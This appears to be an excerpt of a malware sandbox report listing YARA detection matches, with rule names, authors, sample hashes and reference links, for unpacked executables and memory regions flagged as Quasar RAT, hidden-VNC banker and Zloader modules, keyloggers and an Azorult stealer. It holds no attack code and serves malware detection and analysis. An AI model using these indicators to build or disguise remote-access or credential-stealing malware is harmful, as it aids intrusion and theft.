Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
